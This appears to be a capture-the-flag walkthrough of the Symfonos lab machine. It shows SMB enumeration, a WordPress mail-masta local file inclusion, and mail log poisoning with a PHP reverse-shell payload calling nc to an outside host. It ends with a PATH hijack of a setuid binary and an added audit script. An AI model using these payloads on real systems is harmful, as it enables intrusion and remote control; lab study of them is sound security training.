IP address: 192.168.56.15

### information_gathering

Open ports: 25 22 80 139 445

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501129327-9beef5ee-2213-43fb-9d42-569f70a6312c.png#align=left&display=inline&height=71&margin=%5Bobject%20Object%5D&name=image.png&originHeight=142&originWidth=604&size=43849&status=done&style=none&width=302)

```
enum4linux 192.168.56.15
```

SYMFONOS\helios (Local User)

SMB share file:

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501230190-15801b54-7f13-45a3-8335-ccc2fc6e8c26.png#align=left&display=inline&height=80&margin=%5Bobject%20Object%5D&name=image.png&originHeight=159&originWidth=727&size=66323&status=done&style=none&width=363.5)

### Establish a foothold

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501383620-c3d19429-8740-4a8a-8dc5-0b682305e760.png#align=left&display=inline&height=273&margin=%5Bobject%20Object%5D&name=image.png&originHeight=546&originWidth=1393&size=248872&status=done&style=none&width=696.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609501407549-ccb633c8-cf1b-4dc5-9d96-61f8736b46ad.png#align=left&display=inline&height=99&margin=%5Bobject%20Object%5D&name=image.png&originHeight=198&originWidth=1103&size=53907&status=done&style=none&width=551.5)

gobuster found /manual, but nothing there was usable, so I went on to test SMB. I used this command to connect to the helios share:

```
smbclient \\\\192.168.56.15\\helios -U "helios"
```

pwd: qwerty

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503394657-1cbe10d0-e7b0-4b11-94c4-2b7bc21ec389.png#align=left&display=inline&height=240&margin=%5Bobject%20Object%5D&name=image.png&originHeight=480&originWidth=1092&size=143624&status=done&style=none&width=546)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503758366-9172f74e-2ed4-42c1-a78b-b92a495f1cf9.png#align=left&display=inline&height=138&margin=%5Bobject%20Object%5D&name=image.png&originHeight=276&originWidth=1418&size=142787&status=done&style=none&width=709)

This means there is a directory /h3l105.

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609503957973-b04f06f7-2bbc-4c0f-b872-9065fef731e1.png#align=left&display=inline&height=413&margin=%5Bobject%20Object%5D&name=image.png&originHeight=826&originWidth=587&size=46599&status=done&style=none&width=293.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609507973097-bd630842-5227-43a9-ae71-a8f877d98479.png#align=left&display=inline&height=193&margin=%5Bobject%20Object%5D&name=image.png&originHeight=385&originWidth=1065&size=130021&status=done&style=none&width=532.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609507939156-c5b0e3b3-34e1-4550-9ffd-1b9c5df230e3.png#align=left&display=inline&height=68&margin=%5Bobject%20Object%5D&name=image.png&originHeight=135&originWidth=1706&size=28963&status=done&style=none&width=853)

I tried the second LFI:

[http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd](http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd)

LFI -> RCE (reverse shell)

```
telnet 192.168.56.15 25
```

```
mail from: <aatrox>
rcpt to: helios
data
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.178.51 443 > /tmp/f"); ?>
```

Enter `.` on its own line to end the input.

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609509438593-f397fbc9-e622-4839-8e04-45b13f1c942b.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=976&size=140618&status=done&style=none&width=488)

Run the following command to trigger the reverse shell:

```
curl http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609509465002-61697d56-63db-4483-80bf-1ceffc5bc62e.png#align=left&display=inline&height=109&margin=%5Bobject%20Object%5D&name=image.png&originHeight=217&originWidth=972&size=59631&status=done&style=none&width=486)

### Privilege Escalation

```
find / -perm -4000 -type f 2>/dev/null
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609510807305-72e9105b-d867-4a95-abd2-3015d524eb63.png#align=left&display=inline&height=186&margin=%5Bobject%20Object%5D&name=image.png&originHeight=371&originWidth=1049&size=121357&status=done&style=none&width=524.5)

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511042679-dfbc6ec3-58bb-4bdd-82c4-b589007a085a.png#align=left&display=inline&height=207&margin=%5Bobject%20Object%5D&name=image.png&originHeight=413&originWidth=1189&size=68529&status=done&style=none&width=594.5)

From this we can tell the binary calls the curl command; inspect it with strings.

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511496341-149c18ff-8260-4540-84e4-fc9cc05b8831.png#align=left&display=inline&height=340&margin=%5Bobject%20Object%5D&name=image.png&originHeight=680&originWidth=921&size=276774&status=done&style=none&width=460.5)

So what we need to do is write a malicious script named curl and change the environment variable:

```
export PATH=/tmp:$PATH
```

![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609511691440-a2985f29-67a1-4ed9-aa5f-fc3a46dd6088.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=1431&size=531655&status=done&style=none&width=715.5)
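As an added defender-side example (not part of the original writeup), the `find -perm -4000` plus `strings` check above can be turned into a repeatable audit: list setuid binaries and flag any whose embedded strings invoke a command by bare name, which is what lets a directory prepended to PATH decide which `curl` actually runs. The `INTERESTING` command set and `SAMPLE_BINARY` are constructed assumptions, not data from the box.

```python
import os
import re
import stat
import sys

# Commands a helper binary might shell out to; a bare name (no leading "/")
# is resolved through the caller's PATH at run time. Constructed list.
INTERESTING = {"curl", "wget", "nc", "sh", "bash", "python", "perl", "cat", "cp", "mv"}

def extract_strings(data, min_len=4):
    """Minimal re-implementation of `strings`: printable ASCII runs >= min_len."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def relative_invocations(data):
    """Strings whose first word is a bare command from INTERESTING.
    '/usr/bin/curl ...' is absolute and not flagged; 'curl ...' is."""
    return [s for s in extract_strings(data)
            if s.split() and s.split()[0] in INTERESTING]

def is_setuid(path):
    """True for a regular file with the setuid bit set (what -perm -4000 matches)."""
    st = os.stat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def audit(paths):
    """Map each setuid file in paths to the relative invocations found inside it."""
    findings = {}
    for p in paths:
        try:
            if not is_setuid(p):
                continue
            with open(p, "rb") as fh:
                hits = relative_invocations(fh.read())
        except OSError:
            continue  # unreadable or vanished: skip it rather than abort the audit
        if hits:
            findings[p] = hits
    return findings

# Constructed stand-in for a setuid helper that shells out to curl by bare name.
SAMPLE_BINARY = b"\x7fELF\x00\x00curl http://example.invalid/status\x00/usr/bin/id\x00"

if __name__ == "__main__":
    roots = sys.argv[1:] or ["/usr/bin", "/usr/sbin", "/bin", "/sbin", "/opt"]
    files = (os.path.join(d, f) for r in roots for d, _, fs in os.walk(r) for f in fs)
    for path, hits in audit(files).items():
        print(path, hits)
```

A hit is only a lead: confirm with `strings` and the binary's source whether the name is really passed to a shell or `execvp`, and fix it by using an absolute path or a sanitized PATH inside the setuid program.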